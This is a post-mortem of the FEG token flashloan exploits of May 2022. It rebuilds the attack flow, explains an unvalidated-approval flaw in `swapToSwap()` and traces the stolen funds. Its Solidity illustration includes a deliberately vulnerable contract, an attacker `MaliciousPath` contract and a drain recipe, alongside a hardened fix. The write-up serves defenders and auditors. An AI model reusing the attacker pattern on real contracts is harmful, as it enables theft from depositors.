FEG Token Second Flashloan Exploit Analysis


On May 16, 2022 (UTC), the FEG token experienced flashloan attacks on both BNBChain and Ethereum, leading to approximately $1.9M worth of asset loss in total.

Exploit Transactions

Sample exploit transaction (BNBChain):


Sample exploit transaction (Ethereum):


Related Addresses

Exploiter Address:


R0X (unverified contract): https://bscscan.com/address/0xa3d522c151ad654b36bdfe7a69d0c405193a22f9

fBNB (victim contract): https://bscscan.com/address/0x87b1acce6a1958e522233a737313c086551a5c76

Attack Flow

Note: All of the analysis below is based on transaction-level tracing. Because the R0X contract is unverified on BscScan, there is no decisive evidence of the exact attack logic; the flow is reconstructed from the calls and token transfers visible in the transaction.

  1. The attacker borrowed 57,790 WBNB via flashloan and deposited 30 WBNB into fBNB.
  2. The attacker created a new address, 0x3985aa71315a7aa4df3cb19602d61465a8850f61.
  3. The attacker called `depositInternal()` on the unverified R0X contract to deposit 56,705 fBNB into it.
  4. The attacker created a second new address, 0x23a5bfa77cccf71f1015fe5f97c8c9c43706fec4.
  5. The attacker called `BUY()` 15 times to deposit further fBNB for the R0X contract address.
  6. The attacker called `swapToSwap()`, passing 0x23a5bfa77cccf71f1015fe5f97c8c9c43706fec4 as the `path` parameter; the contract approved that address to spend 56,138 fBNB.
  7. The attacker called `SELL()` 30 times to withdraw the deposited fBNB (to address 0x3985aa71315a7aa4df3cb19602d61465a8850f61).
  8. In addition, address 0x23a5bfa77cccf71f1015fe5f97c8c9c43706fec4 called the method with selector `0xe6916552` to transfer the approved fBNB to address 0x3985aa71315a7aa4df3cb19602d61465a8850f61, spending the allowance granted in step 6.
  9. Finally, the attacker withdrew all of the fBNB, repaid the flashloan, and kept the remainder as profit.

Contracts Vulnerability Analysis

The root cause is a flaw in the `swapToSwap()` function: it takes the caller-supplied `path` argument as a trusted party without any validation, and then approves that `path` to spend the contract's own asset balance. Since that balance is pooled, the allowance covers funds belonging to other depositors, not only the caller's. By combining `depositInternal()` (to satisfy the deposit check) with `swapToSwap()` (to obtain the allowance for an address under their control), the attacker gains an allowance on the contract's fBNB and drains the assets held by the contract.
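The pattern described above and in the attack flow, as an added illustration (this is not the R0X or fBNB source, which is unverified): a minimal vulnerable `swapToSwap()` next to an attacker-controlled `path` contract and a hardened version. All contract, function and parameter names are assumptions, as is the accounting detail that the caller's deposit is not debited when the allowance is granted; that detail is consistent with steps 6 through 8 of the flow, where the same deposit is both pulled via the allowance and withdrawn again via `SELL()`.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative reconstruction for this write-up, NOT the R0X/fBNB source
// (R0X is unverified). Contract and function names are assumptions.
interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface ISwapPath {
    function swap(address token, uint256 amountIn, address to) external;
}

// Vulnerable pattern: the caller-supplied `path` is approved to spend the
// contract's pooled fBNB, which also backs other depositors' balances.
contract VulnerableSwapper {
    IERC20 public immutable fBNB;
    mapping(address => uint256) public deposits;

    constructor(IERC20 token) { fBNB = token; }

    function depositInternal(address who, uint256 amount) external {
        require(fBNB.transferFrom(msg.sender, address(this), amount), "transfer failed");
        deposits[who] += amount;
    }

    function SELL(uint256 amount, address to) external {
        deposits[msg.sender] -= amount; // reverts on underflow in 0.8.x
        require(fBNB.transfer(to, amount), "transfer failed");
    }

    // BUG 1: `path` is never checked against a list of trusted routers.
    // BUG 2: the caller's deposit is not debited, so the same fBNB can be
    //        pulled by `path` (via the allowance) AND withdrawn again via SELL().
    function swapToSwap(address path, address token, address to, uint256 amountIn) external {
        require(deposits[msg.sender] >= amountIn, "insufficient deposit");
        require(IERC20(token).approve(path, amountIn), "approve failed");
        ISwapPath(path).swap(token, amountIn, to);
    }
}

// Attacker-controlled `path`: performs no swap, it simply spends the allowance it was given.
contract MaliciousPath is ISwapPath {
    address public immutable receiver;

    constructor(address r) { receiver = r; }

    function swap(address token, uint256 amountIn, address) external override {
        // msg.sender is the swapper contract that just approved this contract
        IERC20(token).transferFrom(msg.sender, receiver, amountIn);
    }
}

// Hardened pattern: allow-listed routers only, debit before the external call,
// approve the exact amount and clear the allowance afterwards.
contract HardenedSwapper {
    IERC20 public immutable fBNB;
    address public immutable owner;
    mapping(address => bool) public trustedRouters;
    mapping(address => uint256) public deposits;

    constructor(IERC20 token) { fBNB = token; owner = msg.sender; }

    function setRouter(address router, bool trusted) external {
        require(msg.sender == owner, "not owner");
        trustedRouters[router] = trusted;
    }

    function depositInternal(address who, uint256 amount) external {
        require(fBNB.transferFrom(msg.sender, address(this), amount), "transfer failed");
        deposits[who] += amount;
    }

    function swapToSwap(address path, address token, address to, uint256 amountIn) external {
        require(trustedRouters[path], "untrusted path");   // fix 1: no arbitrary spender
        require(token == address(fBNB), "unsupported token");
        deposits[msg.sender] -= amountIn;                   // fix 2: debit before calling out
        require(fBNB.approve(path, amountIn), "approve failed");
        ISwapPath(path).swap(token, amountIn, to);
        require(fBNB.approve(path, 0), "reset failed");     // fix 3: no lingering allowance
    }
}
```

With `VulnerableSwapper`, an attacker deposits N fBNB, calls `swapToSwap(maliciousPath, fBNB, attacker, N)` so that `MaliciousPath` pulls N fBNB out through the allowance, and then calls `SELL(N, attacker)` to withdraw the still-credited deposit, netting N fBNB from other depositors per round. In `HardenedSwapper` the same sequence fails at the allow-list check, and even a trusted router cannot be used to withdraw more than the caller's own debited deposit.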

Profit and assets tracing

Attacker fund transfer tracing:

The attacker's initial funds came from Tornado Cash on BNBChain.

Profit by chain:

  • Ethereum: 290.97 ETH
  • BNBChain: 4,343.15 BNB

As of May 16, 2022 11:31:29 UTC, the funds lie in the attacker wallet (0xf99e5f80486426e7d3e3921269ffee9c2da258e2) on both Ethereum and BSC.

Would we spot the issue during the audit?

In an audit, auditors would notice that the untrusted `path` parameter is passed into the protocol and approved to spend the contract's assets. Granting an allowance to a caller-controlled address is dangerous and would be flagged as "Major" severity. A quick check that surfaces this class of issue: every `approve()` or `safeApprove()` call whose spender is a function argument rather than an immutable or allow-listed address deserves a finding. Auditors who explored further would discover the full exploit scenario (deposit, obtain the allowance, withdraw the deposit while the allowance is spent) and highlight it.



Function selectors called on the R0X contract during the attack:

  • 0xbbf12714: depositInternal(address,uint256)
  • 0xc172715c: BUY(uint256,address,uint256)
  • 0xb0711483: swapToSwap(address,address,address,uint256)
  • 0xadd975cc: SELL(uint256,address,uint256,uint256)


Loss by chain:

  • On May 16, 2022 09:24:15 PM UTC, the FEG token experienced flashloan attacks on BNBChain, leading to approximately $1.3M worth of asset loss.
  • On May 16, 2022 11:31:29 UTC, the FEG token experienced flashloan attacks on Ethereum, leading to approximately $587K worth of asset loss.


